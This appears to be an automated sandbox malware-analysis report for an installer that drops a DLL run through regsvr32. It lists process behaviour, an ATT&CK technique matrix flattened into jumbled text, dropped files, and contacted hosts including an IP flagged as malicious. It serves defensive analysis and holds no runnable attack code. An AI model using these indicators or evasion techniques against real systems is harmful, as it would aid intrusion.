Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2AE2E0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,ReadFileEx,SleepEx,GetLastError,16_2_00007FFDFB2AE2E0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB21DBC0 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,VirtualQueryEx,RtlFreeHeap,GetProcessTimes,16_2_00007FFDFB21DBC0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB215BE0 memset,RtlGetVersion,16_2_00007FFDFB215BE0
Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: regsvr32.exe, 00000010.00000003.2325195653.0000000003881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API		1
Windows Service		1
Windows Service		1
Deobfuscate/Decode Files or Information		LSASS Memory137
System Information Discovery		Remote Desktop ProtocolData from Removable Media21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter		Logon Script (Windows)213
Process Injection		2
Obfuscated Files or Information		Security Account Manager1
Network Share Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell		Login HookLogin Hook1
DLL Side-Loading		NTDS141
Security Software Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Masquerading		LSA Secrets2
Process Discovery		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
Virtualization/Sandbox Evasion		Cached Domain Credentials141
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items213
Process Injection		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Regsvr32		Proc Filesystem2
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559884 Sample: file.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 80 71 the.earth.li 2->71 79 Sigma detected: Powershell launch regsvr32 2->79 81 Sigma detected: Potentially Suspicious Child Process Of Regsvr32 2->81 83 AI detected suspicious sample 2->83 14 file.exe 2 2->14         started        17 regsvr32.exe 2->17         started        signatures3 process4 file5 67 C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32 14->67 dropped 20 file.tmp 3 4 14->20         started        77 Suspicious powershell command line found 17->77 23 powershell.exe 17->23         started        signatures6 process7 file8 55 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 20->55 dropped 57 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 20->57 dropped 26 cmd.exe 1 20->26         started        85 Loading BitLocker PowerShell Module 23->85 28 conhost.exe 23->28         started        signatures9 process10 process11 30 file.exe 2 26->30         started        33 conhost.exe 26->33         started        35 timeout.exe 1 26->35         started        file12 69 C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32 30->69 dropped 37 file.tmp 21 7 30->37         started        process13 file14 59 C:\Users\user\AppData\Roaming\is-D8FFC.tmp, PE32+ 37->59 dropped 61 C:\Users\user\...\PoisedCoyote.dll (copy), PE32+ 37->61 dropped 63 C:\Users\user\AppData\...\unins000.exe (copy), PE32 37->63 dropped 65 3 other files (none is malicious) 37->65 dropped 40 regsvr32.exe 37->40         started        process15 process16 42 regsvr32.exe 14 3 40->42         started        dnsIp17 73 154.216.19.129, 49736, 49740, 49753 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 42->73 75 the.earth.li 93.93.131.124, 443, 49738, 49739 MYTHICMythicBeastsLtdGB United Kingdom 42->75 87 System process connects to network (likely due to code injection or exploit) 42->87 89 Suspicious powershell command line found 42->89 91 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 42->91 93 Sets debug register (to hijack the execution of another thread) 42->93 46 powershell.exe 37 42->46         started        49 powershell.exe 37 42->49         started        signatures18 process19 signatures20 95 Loading BitLocker PowerShell Module 46->95 51 conhost.exe 46->51         started        53 conhost.exe 49->53         started        process21

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe0%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_shfoldr.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_shfoldr.dll0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_setup64.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_shfoldr.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp2%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp2%ReversingLabs
C:\Users\user\AppData\Roaming\PoisedCoyote.dll (copy)3%ReversingLabs
C:\Users\user\AppData\Roaming\is-D8FFC.tmp3%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://cacerts.digicert.c0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
the.earth.li
93.93.131.124
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://the.earth.li/~sgtatham/putty/latest/w32/putty.exefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.innosetup.com/file.exe, 00000000.00000003.1748510327.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748200530.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1749281885.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-DOVSB.tmp.6.dr, file.tmp.5.dr, file.tmp.0.drfalse
        		high
        http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1913116591.0000021FA4625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2049496688.000002149E144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000009.00000002.1881087363.0000021F947D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E2FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.1881087363.0000021F947D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E2FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://api.msn.com/qregsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://api.msn.com:443/v1/news/Feed/Windows?regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1913116591.0000021FA4625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2049496688.000002149E144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Iconpowershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://docs.rs/getrandom#nodejs-es-module-supportfile.tmp, 00000006.00000003.1789026333.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp, is-D8FFC.tmp.6.drfalse
                                  		high
                                  http://cacerts.digicert.cregsvr32.exe, 00000008.00000003.1818287850.0000000002934000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2089574907.0000000002945000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2324197266.00000000038C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.msn.com/regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/pscore68powershell.exe, 00000009.00000002.1881087363.0000021F945B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E481000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.microsoft.cpowershell.exe, 00000009.00000002.1921586400.0000021FACAA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.remobjects.com/psfile.exe, 00000000.00000003.1748510327.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748200530.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1749281885.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-DOVSB.tmp.6.dr, file.tmp.5.dr, file.tmp.0.drfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1881087363.0000021F945B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E481000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              154.216.19.129
                                              		unknownSeychelles
                                              		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                              93.93.131.124
                                              		the.earth.liUnited Kingdom
                                              		44684MYTHICMythicBeastsLtdGBfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1559884
                                              Start date and time:2024-11-21 02:57:05 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 24s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:20
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:file.exe
                                              Detection:MAL
                                              Classification:mal80.evad.winEXE@26/24@1/2
                                              EGA Information:
